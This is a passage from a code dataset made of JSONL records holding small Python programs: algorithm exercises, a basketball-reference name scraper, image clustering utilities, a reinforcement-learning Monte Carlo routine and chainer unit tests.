range(cnt, n+1):\n if i not in s:\n s.append(i)\n sol(i+1)\n s.pop()\nsol(1)","repo_name":"InKyuHwang001/Algorithm","sub_path":"백준/백트래킹/Python/실버/15650.py","file_name":"15650.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72982681154","text":"from requests import get\nfrom bs4 import BeautifulSoup\nimport unicodedata\nimport unidecode\n\n\ndef create_last_name_part_of_suffix(potential_last_names):\n last_names = ''.join(potential_last_names)\n if len(last_names) <= 5:\n return last_names[:].lower()\n else:\n return last_names[:5].lower()\n\n\ndef get_player_suffix(name):\n normalized_name = unidecode.unidecode(unicodedata.normalize(\n 'NFD', name).encode('ascii', 'ignore').decode(\"utf-8\"))\n if normalized_name == 'Metta World Peace':\n suffix = '/players/a/artesro01.html'\n else:\n split_normalized_name = normalized_name.split(' ')\n if len(split_normalized_name) < 2:\n return None\n initial = normalized_name.split(' ')[1][0].lower()\n all_names = name.split(' ')\n first_name_part = unidecode.unidecode(all_names[0][:2].lower())\n first_name = all_names[0]\n other_names = all_names[1:]\n other_names_search = other_names\n last_name_part = create_last_name_part_of_suffix(other_names)\n suffix = '/players/'+initial+'/'+last_name_part+first_name_part+'01.html'\n player_r = get(f'https://www.basketball-reference.com{suffix}', timeout=10)\n while player_r.status_code == 404:\n other_names_search.pop(0)\n last_name_part = create_last_name_part_of_suffix(other_names_search)\n initial = last_name_part[0].lower()\n suffix = '/players/'+initial+'/'+last_name_part+first_name_part+'01.html'\n player_r = get(\n f'https://www.basketball-reference.com{suffix}', timeout=10)\n while player_r.status_code == 200:\n player_soup = BeautifulSoup(player_r.content, 'html.parser')\n h1 = player_soup.find('h1')\n if h1:\n page_name 
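The two 15650 solutions above are equivalent: the backtracking version enumerates ascending m-subsets of 1..n in lexicographic order, which is exactly what itertools.combinations yields. (Note the recursive sol() keeps exploring after printing because it lacks a return; the output is still correct, it just wastes work.) A generator form of the same recursion, checked against combinations:

```python
from itertools import combinations

def subsets(n, m, start=1, chosen=()):
    if len(chosen) == m:
        yield chosen
        return                                   # the return the original omits
    for i in range(start, n + 1):
        yield from subsets(n, m, i + 1, chosen + (i,))

n, m = 4, 2
assert list(subsets(n, m)) == list(combinations(range(1, n + 1), m))
```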
= h1.find('span').text\n if ((unidecode.unidecode(page_name)).lower() == normalized_name.lower()):\n return suffix.rstrip('.html')\n else:\n page_names = unidecode.unidecode(page_name).lower().split(' ')\n page_first_name = page_names[0]\n if first_name.lower() == page_first_name.lower():\n return suffix.rstrip('.html')\n # if players have same first two letters of last name then just\n # increment suffix\n elif first_name.lower()[:2] == page_first_name.lower()[:2]:\n player_number = int(\n ''.join(c for c in suffix if c.isdigit())) + 1\n if player_number < 10:\n player_number = f\"0{str(player_number)}\"\n suffix = f\"/players/{initial}/{last_name_part}{first_name_part}{player_number}.html\"\n else:\n other_names_search.pop(0)\n last_name_part = create_last_name_part_of_suffix(\n other_names_search)\n initial = last_name_part[0].lower()\n suffix = '/players/'+initial+'/'+last_name_part+first_name_part+'01.html'\n\n player_r = get(\n f'https://www.basketball-reference.com{suffix}', timeout=10)\n\n return None\n","repo_name":"asap-blocky/nba-player-prop-prediction-model","sub_path":"src/get_player_suffix.py","file_name":"get_player_suffix.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14297849239","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 17 08:59:22 2018\n\n@author: mathvolcano\n\nSimplify Unix Path\n\"\"\"\n\nclass Solution:\n def simplifyPath(self, path):\n \"\"\"\n :type path: str\n :rtype: str\n \"\"\"\n # already in top directory\n if path in ['/../', '/.']:\n return '/'\n if path[:4] == '/../':\n path = '/' + path[4:]\n \n # replace multiple slashes\n while ('//' in path) or ('/./' in path):\n path = (path.replace('//', '/').replace('/./', '/'))\n \n # Move up one directory\n directory_moves = path.split('/')\n while '..' 
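get_player_suffix above disambiguates players who share a name prefix by bumping the trailing two-digit counter in the candidate URL. The increment step, isolated (a sketch that assumes digits appear only in that counter, as they do in these paths):

```python
def next_candidate(suffix):
    digits = ''.join(c for c in suffix if c.isdigit())
    stem = suffix.replace(digits + '.html', '')
    return f"{stem}{int(digits) + 1:02d}.html"   # zero-pad back to two digits

print(next_candidate('/players/j/jamesle01.html'))  # /players/j/jamesle02.html
```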
in directory_moves:\n # Get index of last occurrence in liast and remove it\n dotdot_idx = directory_moves.index('..')\n # Already in top directory\n if dotdot_idx == 0:\n directory_moves = directory_moves[1:]\n \n # Move out of previous directory\n if dotdot_idx >= 1:\n directory_moves \\\n = directory_moves[:dotdot_idx-1] + directory_moves[dotdot_idx+1:]\n path = '/'*(len(directory_moves) == 0) + '/'.join(directory_moves)\n \n # Return \"/home//foo/\" -> \"/home/foo\"\n if len(path) > 1 and (path[-1] == '/'):\n path = path[:-1]\n \n # Catch edge cases\n \n # End\n if path[-2:] == '/.':\n path = path[:-2]\n \n if len(path) == 0:\n path = '/'\n \n if path[0] != '/':\n path = '/' + path\n \n return path\n","repo_name":"mathvolcano/leetcode","sub_path":"simplifyPath.py","file_name":"simplifyPath.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9652031004","text":"\"\"\"\nThis module holds the code for the calculation of MRMR\n\"\"\"\n\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.feature_selection import f_regression\nfrom xgboost import XGBRegressor\nimport numpy as np\n\nfrom sklearn.model_selection import cross_val_score\nfrom xgboost import XGBRegressor\n\ndef generate_xgboost_score(features, label, feature_list):\n score_list = []\n for i in range(1, len(feature_list)):\n regressor = XGBRegressor(n_jobs=-1)\n mse = cross_val_score(regressor, features[:,:i], label, scoring='neg_mean_squared_error')\n mse = [abs(value) for value in mse]\n score_list.append(np.mean(np.sqrt(mse)))\n return score_list\n\ndef generate_rf_score(features, label, feature_list):\n score_list = []\n for i in range(1, len(feature_list)):\n regressor = RandomForestRegressor(n_jobs=-1)\n mse = cross_val_score(regressor, features[:,:i], label, scoring='neg_mean_squared_error')\n mse = [abs(value) for value in mse]\n score_list.append(np.mean(np.sqrt(mse)))\n return score_list","repo_name":"tzz89/feature_selection","sub_path":"feature_selection/mrmr.py","file_name":"mrmr.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71816846273","text":"def main():\n\td = {'one':1,'two':2,'three':3,'four':4} #1 way to make a dictionary\n\tprint(d)\n\tprint(type(d)) #class dict\n\n\td2 = dict(\n\t\tone = 1, two = 2, three = 3, four = 4, five = 'five'\n\t) # a second way to create a dictionary\n\n\tfor key in d:\n\t\tprint(key,d[key])\n\n\tfor key in sorted(d.keys()): #sorts alphabetically using the keys() method\n\t\tprint(key,d[key])\n\n\tfor key in d2:\n\t\tprint(key,d2[key])\n\n\tfor key in sorted(d2.keys()): #sorts alphabetically using the keys() method\n\t\tprint(key,d2[key])\n\nif __name__ == '__main__':\n\tmain()","repo_name":"jdeason23/learning_python","sub_path":"dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18230825544","text":"#! 
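The simplifyPath record above handles '..' by index surgery on the split segments, which is why it needs so many edge-case patches at the end. The textbook alternative is a single pass with a stack, where empty segments, '.', and '..' each become one branch:

```python
def simplify_path(path):
    stack = []
    for part in path.split('/'):
        if part in ('', '.'):
            continue                  # '//' and '/./' contribute nothing
        if part == '..':
            if stack:
                stack.pop()           # go up one level; '/..' at root is a no-op
        else:
            stack.append(part)
    return '/' + '/'.join(stack)

for p in ('/home//foo/', '/../', '/a/./b/../../c/'):
    print(p, '->', simplify_path(p))  # /home/foo, /, /c
```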
/usr/bin/env python\n#coding:utf-8\n\nimport os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'HealthSearch.settings')\nimport django\n\nif django.VERSION >= (1, 7):\n django.setup()\n\ndef main():\n from webapp.models import QuestionAnswer\n from webapp.models import TagDict\n QuestionAnswer.objects.all().delete()#清空表\n TagDict.objects.all().delete()#清空表\n fp = open('./webapp/static/data/test_data.txt', 'r')\n QAList = []\n TDList = []\n for line in fp:\n txt = line.strip()\n Q_index = txt.find('Q:')\n A_index = txt.find('A:')\n Tag_index = txt.find('TAGS:')\n question = txt[Q_index+2:A_index].strip()\n answer = txt[A_index+2:Tag_index].strip()\n tag_line = line[Tag_index+5:]\n tag_list = tag_line.strip().split(\",\")\n tag_list_fin = [t.strip().lower() for t in tag_list]\n QAList.append(QuestionAnswer(question = question, answer = answer, tags = tag_list_fin))\n fp.close()\n QuestionAnswer.objects.bulk_create(QAList)\n obj = QuestionAnswer.objects.all()\n op = [[item.id,item.tags] for item in obj]\n fp1 = open('./webapp/static/data/tag_test.txt', 'r')\n fp2 = open('./webapp/static/data/tag_test_ch.txt', 'r')\n tag_en_list = fp1.readlines()\n tag_ch_list = fp2.readlines()\n fp1.close()\n fp2.close()\n tag_en_list_fin = [t.strip() for t in tag_en_list]\n tag_ch_list_fin = [t.strip() for t in tag_ch_list]\n tag_count = len(tag_en_list_fin)\n for i in range(tag_count):\n tag_ch = tag_ch_list_fin[i]\n tag_en = tag_en_list_fin[i]\n tag_class = []\n for j in op:\n if tag_en in j[1]:\n tag_class.append(int(j[0]))\n TDList.append(TagDict(tag_ch = tag_ch, tag_en = tag_en, tag_class = tag_class))\n TagDict.objects.bulk_create(TDList)\nif __name__ == '__main__':\n main()\n print ('Data write successfully!')\n","repo_name":"GrittyChen/HealthSearch","sub_path":"src/dbwrite.py","file_name":"dbwrite.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43047797150","text":"import time\nimport streamlit as st\nfrom core.utils import format_events\n\nfrom view.base import BaseView\n\n\nclass DeleteView(BaseView):\n def main_delete(self):\n events = self._event.get_by_email(creator=st.session_state.email)\n if events:\n col1, _ = st.columns([3, 1])\n with col1:\n selected_events = st.multiselect(\n \"Выберите события для отмены\",\n events,\n format_func=lambda x: format_events(x),\n )\n submit = st.button(\"Удалить выбранные события\")\n if submit:\n if not selected_events:\n st.stop()\n\n self._event.delete(selected_events)\n\n st.success(\"✅ Бронирование отменено\")\n time.sleep(1)\n st.experimental_rerun()\n\n else:\n st.warning(\"⚠️ События не найдены, попробуйте добавить их на вкладке 'Создать'\")\n","repo_name":"selezGit/novatickets","sub_path":"src/view/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73698422274","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 5 17:25:37 2019\n\n@author: TEJAS\n\"\"\"\nimport numpy as np\nfrom functools import reduce\nfrom sklearn.cluster import KMeans, MeanShift, AgglomerativeClustering,DBSCAN\nfrom mpl_toolkits.mplot3d import Axes3D\nimport cv2\nimport matplotlib.pyplot as plt\n\nclass computeLibs:\n \n def decorrstretch(self,A, tol=None):\n \"\"\"\n Apply decorrelation stretch to image\n Arguments:\n A -- image in cv2/numpy.array format\n tol -- upper and lower limit of contrast stretching\n \"\"\"\n \n # save 
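dbwrite above slices each line with three find() calls against the `Q: ... A: ... TAGS: a, b` layout. The same extraction as a single regex, assuming that layout holds (a rewrite for illustration, not the repo's code):

```python
import re

LINE_RE = re.compile(r'Q:(?P<q>.*?)A:(?P<a>.*?)TAGS:(?P<tags>.*)', re.S)

def parse_qa(line):
    m = LINE_RE.search(line)
    if m is None:
        return None
    tags = [t.strip().lower() for t in m.group('tags').split(',')]
    return m.group('q').strip(), m.group('a').strip(), tags

print(parse_qa('Q: What is flu? A: A viral infection. TAGS: Flu, Virus'))
# ('What is flu?', 'A viral infection.', ['flu', 'virus'])
```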
the original shape\n orig_shape = A.shape\n # reshape the image\n # B G R\n # pixel 1 .\n # pixel 2 .\n # . . . .\n A = A.reshape((-1,3)).astype(np.float)\n # covariance matrix of A\n cov = np.cov(A.T)\n # source and target sigma\n sigma = np.diag(np.sqrt(cov.diagonal()))\n # eigen decomposition of covariance matrix\n eigval, V = np.linalg.eig(cov)\n # stretch matrix\n S = np.diag(1/np.sqrt(eigval))\n # compute mean of each color\n mean = np.mean(A, axis=0)\n # substract the mean from image\n A -= mean\n # compute the transformation matrix\n T = reduce(np.dot, [sigma, V, S, V.T])\n # compute offset \n offset = mean - np.dot(mean, T)\n # transform the image\n A = np.dot(A, T)\n # add the mean and offset\n A += mean + offset\n # restore original shape\n B = A.reshape(orig_shape)\n # for each color...\n for b in range(3):\n # apply contrast stretching if requested\n if tol:\n # find lower and upper limit for contrast stretching\n low, high = np.percentile(B[:,:,b], 100*tol), np.percentile(B[:,:,b], 100-100*tol)\n B[Bhigh] = high\n # ...rescale the color values to 0..255\n B[:,:,b] = 1 * (B[:,:,b] - B[:,:,b].min())/(B[:,:,b].max() - B[:,:,b].min())\n # return it as uint8 (byte) image\n return np.asarray(B,dtype='float32')\n \n def __MSE(self,Im1, Im2):\n \t# computes error\n \tDiff_Im = Im2-Im1\n \tDiff_Im = np.power(Diff_Im, 2)\n \tDiff_Im = np.sum(Diff_Im, axis=2)\n \tDiff_Im = np.sqrt(Diff_Im)\n \tsum_diff = np.sum(np.sum(Diff_Im))\n \tavg_error = sum_diff / float(Im1.shape[0]*Im2.shape[1])\n \treturn avg_error\n \n def __KmeansHelper(self,img,no_of_clusters):\n imgShapeLen = len(img.shape)\n if imgShapeLen==3:\n H,W,C = img.shape\n k_img = img.reshape(H*W,3)\n else:\n H,W,C,X,Y = img.shape \n k_img = img.reshape(H*W*X*Y,3)\n \n Kmean = KMeans(n_clusters=no_of_clusters)\n Kmean.fit(k_img)\n kmean_clusters = np.asarray(Kmean.cluster_centers_,dtype=np.float32)\n if imgShapeLen ==3:\n reconstructedImg = kmean_clusters[Kmean.labels_,:].reshape(H,W,C)\n else:\n reconstructedImg = kmean_clusters[Kmean.labels_,:].reshape(H,W,C,X,Y)\n loss = self.__MSE(img,reconstructedImg)\n if imgShapeLen==3:\n labels = Kmean.labels_.reshape(H,W,1)\n else:\n labels = Kmean.labels_.reshape(H,W,X,Y,1)\n return labels,loss,reconstructedImg\n \n def kmeans(self,img,no_of_clusters=6,bruteforceRange=(0,12),bruteforce=False):\n labels = None \n if bruteforce:\n l,h = bruteforceRange\n loss = []\n reconstructedImg = []\n for i in range(l,h):\n print('Starting Clustering with'+str(i)+'centers')\n _,l,reconstImg = self.__KmeansHelper(img,i) \n loss.append(l)\n reconstructedImg.append(reconstImg) \n else:\n labels,loss,reconstructedImg = self.__KmeansHelper(img,no_of_clusters) \n return labels,no_of_clusters,loss,reconstructedImg \n\n def meanShift(self,img):\n img = img.reshape(-1,3)\n clustering = MeanShift(bandwidth=10,min_bin_freq=20,bin_seeding=True).fit(img)\n labels = clustering.labels_\n return labels\n \n def agglomerativeClustering(self,img,n_clusters = 6):\n img = img.reshape(-1,3)\n clustering = AgglomerativeClustering(n_clusters=n_clusters).fit(img)\n labels = clustering.labels_\n return labels\n \n def Dbscan(self,img,eps=0.3,min_samples=5):\n img = img.reshape(-1,3)\n clustering = DBSCAN(eps, min_samples).fit(img)\n labels = clustering.labels_\n return labels\n \nclass plotLibs:\n \n def dispImg(self,img,k=0,title='image',save=1):\n plt.figure(figsize=(10,10))\n plt.title(title)\n plt.imshow(img)\n if save:\n if k:\n plt.savefig('Plots/Kmeans/k_means_'+str(k)+'.jpg')\n else:\n 
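Two notes on decorrstretch above. The clamp lines `B[Bhigh] = high` appear extraction-damaged: the comparison operators were likely stripped, and they presumably read `B[B < low] = low` and `B[B > high] = high`. And the heart of the routine is the whitening matrix W = V S V^T built from the eigendecomposition of the channel covariance: for centered pixels, cov(A @ W) is the identity, and the extra sigma factor then restores the original per-channel spread. A numerical check of the whitening step:

```python
import numpy as np

rng = np.random.default_rng(0)
A = rng.normal(size=(1000, 3)) @ rng.normal(size=(3, 3))  # correlated "pixels"
A = A - A.mean(axis=0)
eigval, V = np.linalg.eig(np.cov(A.T))
W = V @ np.diag(1 / np.sqrt(eigval)) @ V.T                # V S V^T from above
print(np.round(np.cov((A @ W).T), 6))                     # ~identity matrix
```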
plt.savefig('Plots/Others/'+title+'.jpg')\n plt.show()\n \n def plot_3d(self,img):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n r, g, b = cv2.split(img)\n r,g,b = r.flatten(), g.flatten(), b.flatten()\n fig = plt.figure()\n ax = Axes3D(fig)\n ax.scatter(r, g, b)\n plt.show()\n \n def __segments(self,img,labels,center):\n labels = np.array(labels,dtype='float32')\n labels[labels!=center]= np.nan\n labels[labels==center]=1\n labels[labels==np.nan] = 0\n return img*labels\n \n def dispSegment(self,img,labels,number_of_clusters,name):\n M,N = number_of_clusters//3,3\n fig, axs = plt.subplots(M,N, figsize=(60, 60), facecolor='w', edgecolor='k',squeeze=True)\n fig.subplots_adjust(hspace = 0.1, wspace=.01)\n axs = axs.ravel()\n for i in range(number_of_clusters):\n segment = self.__segments(img,labels,i)\n axs[i].imshow(segment)\n axs[i].set_title('segment'+str(i)) \n plt.savefig('Plots/Segments/'+name+str(number_of_clusters)+'.jpg')\n \n def dispKmeansBruteImg(self,reconstructedImg,l,plt_name):\n M,N = len(reconstructedImg)//2,2\n fig, axs = plt.subplots(M,N, figsize=(60, 60), facecolor='w', edgecolor='k',squeeze=True)\n fig.subplots_adjust(hspace = 0.1, wspace=.01)\n axs = axs.ravel()\n for i in range(len(reconstructedImg)):\n axs[i].imshow(reconstructedImg[i])\n axs[i].set_title('K_'+str(i+l)) \n plt.savefig('Plots/Kmeans/'+plt_name+'.jpg')\n plt.show()\n \n def plotLoss(self,Loss,plt_name):\n plt.plot(Loss)\n plt.savefig('Plots/Kmeans/Loss_'+plt_name+'.jpg') \n plt.show() \n \n \n \nclass imgLibs:\n \n def __init__(self,imgName,clrSpace='rgb'):\n self.img = np.load(imgName)\n self.imgShape = self.img.shape\n self.clrSpace = clrSpace\n \n def loadImg(self):\n self.img[np.isnan(self.img)] = 0\n if self.clrSpace =='rgb':\n return self.img\n elif self.clrSpace == 'hsv':\n return cv2.cvtColor(self.img, cv2.COLOR_BGR2HSV)\n elif self.clrSpace == 'gray':\n return cv2.cvtColor(self.img,cv2.COLOR_BGR2GRAY)\n \n \n\n ","repo_name":"TejasPanambur/Segmentation-of-Martian-Terrain-using-Clustering-Algortims","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23557867641","text":"infile=open('B-large.in','r')\noutfile=open('B-large-output.in','a')\n\nfirst=True\nl=0\nfor line in infile:\n impossible=False\n l=l+1\n if first==True:\n first=False\n continue\n line=line.split(\" \")\n untidy=list(line[0])\n for t in range(len(untidy)-1):\n change=False\n for i in range(len(untidy)-1):\n if len(untidy)==2:\n break\n if change==True:\n untidy[i]=str(9)\n continue\n if untidy[i+1]=='\\n':\n break\n if int(untidy[i])>int(untidy[i+1]):\n untidy[i]=str(int(untidy[i])-1)\n untidy[i+1]='9'\n change=True\n continue\n\n outfile.write('Case #'+str(l-1)+': '+str(int(''.join(untidy)))+'\\n')\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3196.py","file_name":"3196.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16507081683","text":"from collections import defaultdict\nimport sys\nimport numpy as np\nfrom multiagent.policy.random import RandomPolicy\n\ndef mc_prediction_execution(env, num_episodes=100, discount_factor=1.0):\n \"\"\"\n Monte Carlo prediction algorithm. 
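The tidy-numbers record above sweeps the digit string repeatedly, decrementing at each descent and filling the tail with 9s. The same idea stated directly, with the restart made explicit (a decrement can create a new descent further left):

```python
def last_tidy(n):
    digits = list(str(n))
    i = 1
    while i < len(digits):
        if digits[i - 1] > digits[i]:            # descent found
            digits[i - 1] = str(int(digits[i - 1]) - 1)
            digits[i:] = '9' * (len(digits) - i) # tail becomes all 9s
            i = 1                                # rescan from the left
        else:
            i += 1
    return int(''.join(digits))                  # int() drops a leading zero

assert last_tidy(132) == 129
assert last_tidy(1000) == 999
assert last_tidy(7) == 7
```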
Calculates the value function\n for a given policy using sampling.\n \n Args:\n env: OpenAI gym environment.\n num_episodes: Nubmer of episodes to sample.\n discount_factor: Lambda discount factor.\n \n Returns:\n A dictionary that maps from state -> value.\n The state is a tuple and the value is a float.\n \"\"\"\n\n # Keeps track of sum and count of returns for each state\n # to calculate an average. We could use an array to save all\n # returns (like in the book) but that's memory inefficient.\n returns_sum = defaultdict(float)\n returns_count = defaultdict(float)\n \n # The final value function\n V = defaultdict(float)\n policies = [RandomPolicy(env,i) for i in range(env.n)]\n for i_episode in range(1, num_episodes + 1):\n # Print out which episode we're on, useful for debugging.\n if i_episode % 10 == 0:\n print(\"\\rEpisode {}/{}.\".format(i_episode, num_episodes), end=\"\")\n sys.stdout.flush()\n\n # Generate an episode.\n # An episode is an array of (state, action, reward) tuples\n episode = []\n state = env.reset()\n for t in range(100):\n # probs = policy(state)\n # action = np.random.choice(np.arange(len(probs)), p=probs)\n action = []\n for i, policy in enumerate(policies):\n action.append(policy.action(state[i]))\n next_state, reward, done, _ = env.step(action)\n episode.append((state, action, reward))\n if done[0]:\n break\n state = next_state\n\n # Find all states that we've visited in this episode\n # We convert each state to a tuple so that we can use it as a dict key\n\n states_in_episode = [x[0] for x in episode]\n for state in states_in_episode:\n\n # Find the first occurance of the state in the episode\n first_occurence_idx = next(i for i,x in enumerate(episode) if np.array(x[0]).all() == state[0].all())\n # Sum up all rewards since the first occurance\n G = sum(x[2][0] for x in episode[first_occurence_idx:])\n # Calculate average return for this state over all sampled episodes\n returns_sum[tuple(state[0])] += G\n returns_count[tuple(state[0])] += 1.0\n V[tuple(state[0])] = returns_sum[tuple(state[0])] / returns_count[tuple(state[0])]\n\n # print(V)\n return V","repo_name":"darshil333/CSE574","sub_path":"multiagent/execution/mc_prediction.py","file_name":"mc_prediction.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40041636126","text":"#!/usr/bin/env python\n\"\"\"utils_tests.py: Some correctness tests\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n__author__ = \"Fabien Cromieres\"\n__license__ = \"undecided\"\n__version__ = \"1.0\"\n__email__ = \"fabien.cromieres@gmail.com\"\n__status__ = \"Development\"\n\nimport numpy as np\nimport chainer\nfrom chainer import Link, Chain, ChainList, Variable\nimport chainer.functions as F\nimport chainer.links as L\n\nimport nmt_chainer.models as models\nimport nmt_chainer.utilities.utils as utils\n\n\nfrom nmt_chainer.__main__ import main\nfrom nmt_chainer.utilities.utils import de_batch\n\n\nclass TestDeBatch:\n def test_multiple_length(self):\n batch = [np.array([1, 3, 4, 8]), np.array([1, 5, 6, 9]), np.array([7, 5]), np.array([10])]\n seq_list = de_batch(batch)\n\n assert seq_list == [[1, 1, 7, 10], [3, 5, 5], [4, 6], [8, 9]]\n\n def test_multiple_length_variable(self):\n batch = [Variable(np.array(x, dtype=np.int32)) for x in [[1, 3, 4, 8], [1, 5, 6, 9], [7, 5], [10]]]\n seq_list = de_batch(batch, is_variable=True)\n\n assert seq_list == [[1, 1, 7, 10], [3, 5, 5], [4, 6], [8, 
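Two remarks on the MC prediction record above. The first-occurrence search compares `np.array(x[0]).all() == state[0].all()`, which compares two scalar booleans rather than the arrays themselves, so it appears to match index 0 in general. And the returns_sum/returns_count bookkeeping can be folded into the standard incremental form V(s) <- V(s) + (G - V(s)) / N(s), which computes the same running mean exactly:

```python
from collections import defaultdict

V = defaultdict(float)
N = defaultdict(int)

def mc_update(state, G):
    N[state] += 1
    V[state] += (G - V[state]) / N[state]   # incremental running mean

for G in (1.0, 3.0, 5.0):
    mc_update('s0', G)
print(V['s0'])  # 3.0, the mean of the sampled returns
```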
9]]\n\n def test_multiple_length_variable_raw(self):\n batch = [Variable(np.array(x, dtype=np.int32)) for x in [[1, 3, 4, 8], [1, 5, 6, 9], [[7, 9], [5, 8]], [10]]]\n seq_list = de_batch(batch, is_variable=True, raw=True)\n assert len(seq_list) == 4\n for seq1, seq2 in zip(seq_list, [[1, 1, [7, 9], 10], [3, 5, [5, 8]], [4, 6], [8, 9]]):\n assert len(seq1) == len(seq2)\n for elem1, elem2 in zip(seq1, seq2):\n assert np.all(elem1 == elem2)\n\n def test_multiple_length_eos_idx(self):\n batch = [np.array([1, 3, 4, 8]), np.array([3, 3, 6, 9]), np.array([7, 5]), np.array([10])]\n seq_list = de_batch(batch, eos_idx=3)\n assert seq_list == [[1, 3], [3], [4, 6], [8, 9]]\n\n def test_mask1(self):\n batch = [np.array([1, 3, 4, 8]), np.array([1, 5, 6, 9]), np.array([7, 5, 3, 4])]\n mask = [np.array([True, True, True, True]), np.array([True, True, True, True]), np.array([True, True, True, True])]\n seq_list = de_batch(batch, mask=mask)\n assert seq_list == [[1, 1, 7], [3, 5, 5], [4, 6, 3], [8, 9, 4]]\n\n def test_mask2(self):\n batch = [np.array([1, 3, 4, 8]), np.array([1, 5, 6, 9]), np.array([7, 5, 3, 4])]\n mask = [np.array([True, True, True, True]), np.array([True, True, False, True]), np.array([True, True, False, False])]\n seq_list = de_batch(batch, mask=mask)\n assert seq_list == [[1, 1, 7], [3, 5, 5], [4], [8, 9]]\n\n def test_mask3(self):\n batch = [np.array([1, 3, 4, 8]), np.array([1, 5, 6, 9]), np.array([7, 5, 3, 4])]\n mask = [np.array([True, True, False, True]), np.array([True, True, False, False])]\n seq_list = de_batch(batch, mask=mask)\n assert seq_list == [[1, 1, 7], [3, 5, 5], [4], [8, 9]]\n# print(seq_list)\n# print(seq_list == [[1,1,[7,9],10], [3,5,[5,8]], [4,6], [8,9]])\n# assert np.all(seq_list == [[1,1,[7,9],10], [3,5,[5,8]], [4,6], [8,9]])\n\n\nimport nmt_chainer.dataprocessing.make_data as make_data\nimport nmt_chainer.training_module.train as train\nimport os.path\n\n# test_data_dir = \"tests_data\"\n\n\nclass TestMakeData:\n def test_data_creation(self, tmpdir, gpu):\n test_data_dir = os.path.join(\n os.path.dirname(\n os.path.abspath(__file__)),\n \"../tests_data\")\n train_dir = tmpdir.mkdir(\"train\")\n data_prefix = str(train_dir.join(\"test1.data\"))\n train_prefix = str(train_dir.join(\"test1.train\"))\n args = [\"make_data\", os.path.join(test_data_dir, \"src2.txt\"), os.path.join(test_data_dir, \"tgt2.txt\"), data_prefix]\n main(arguments=args)\n\n args_train = [\"train\", data_prefix, train_prefix] + \"--max_nb_iters 5 --mb_size 2 --Ei 10 --Eo 12 --Hi 30 --Ha 70 --Ho 15 --Hl 23\".split(\" \")\n if gpu is not None:\n args_train += ['--gpu', gpu]\n main(arguments=args_train)\n","repo_name":"fabiencro/knmt","sub_path":"tests/suite1/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"61"} +{"seq_id":"69803632516","text":"values = []\r\ndiffs = []\r\nfor i in range(int(input())):\r\n values.append([int(a) for a in input().split()])\r\nvalues.sort(key=lambda v: v[0])\r\n# print(values)\r\nfor i in range(1, len(values)):\r\n t0, s0 = values[i-1]\r\n t1, s1 = values[i]\r\n # print(s0, s1, t0, t1,(s1-s0)/(t1-t0))\r\n diffs.append(abs((s1-s0)/(t1-t0)))\r\nprint(max(diffs))\r\n","repo_name":"Cynthia7979/CCC-prep","sub_path":"2020/S1.py","file_name":"S1.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1729510123","text":"\"\"\"This module implements a 
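The de_batch tests above pin down its contract: the batch is time-major, so de-batching is a transpose that drops entries once a step runs short and truncates a sequence at eos_idx. A minimal reimplementation inferred from the asserts alone (the real nmt_chainer helper also handles Variables, raw mode, and masks):

```python
def de_batch_sketch(batch, eos_idx=None):
    n_seq = len(batch[0])
    seqs = [[] for _ in range(n_seq)]
    done = [False] * n_seq
    for step in batch:
        for j in range(min(n_seq, len(step))):
            if not done[j]:
                seqs[j].append(step[j])
                if eos_idx is not None and step[j] == eos_idx:
                    done[j] = True               # eos is kept, then we stop
    return seqs

assert de_batch_sketch([[1, 3, 4, 8], [1, 5, 6, 9], [7, 5], [10]]) == \
    [[1, 1, 7, 10], [3, 5, 5], [4, 6], [8, 9]]
assert de_batch_sketch([[1, 3, 4, 8], [3, 3, 6, 9], [7, 5], [10]], eos_idx=3) == \
    [[1, 3], [3], [4, 6], [8, 9]]
```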
